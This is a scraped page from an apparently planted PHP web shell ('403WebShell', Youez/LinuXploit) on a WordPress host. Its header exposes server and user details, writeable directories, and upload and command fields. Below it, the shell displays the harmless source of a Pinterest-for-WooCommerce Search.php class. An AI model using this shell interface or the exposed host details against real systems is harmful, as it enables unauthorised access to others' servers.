Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/maze/wp-content/plugins/pinterest-for-woocommerce/src/Tracking/Data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/maze/wp-content/plugins/pinterest-for-woocommerce/src/Tracking/Data/Search.php
<?php
/**
 * Pinterest tracking search data class.
 *
 * @package Pinterest_For_WooCommerce/Classes/
 * @version 1.0.0
 */

namespace Automattic\WooCommerce\Pinterest\Tracking\Data;

use Automattic\WooCommerce\Pinterest\Tracking\Data;

/**
 * Custom data for events which require search string e.g. search, view search results, etc.
 *
 * @link https://developers.pinterest.com/docs/conversions/best/#Required,%20recommended,%20and%20optional%20fields
 *
 * @since 1.4.0
 */
class Search extends Data {

	/**
	 * Search query string.
	 *
	 * @var string
	 */
	private $search_query;

	/**
	 * @param string $event_id     A unique event id.
	 * @param string $search_query Search query.
	 */
	public function __construct( $event_id, $search_query ) {
		parent::__construct( $event_id );
		$this->search_query = $search_query;
	}

	/**
	 * Returns search query string.
	 *
	 * @since 1.4.0
	 *
	 * @return string
	 */
	public function get_search_query() {
		return $this->search_query;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit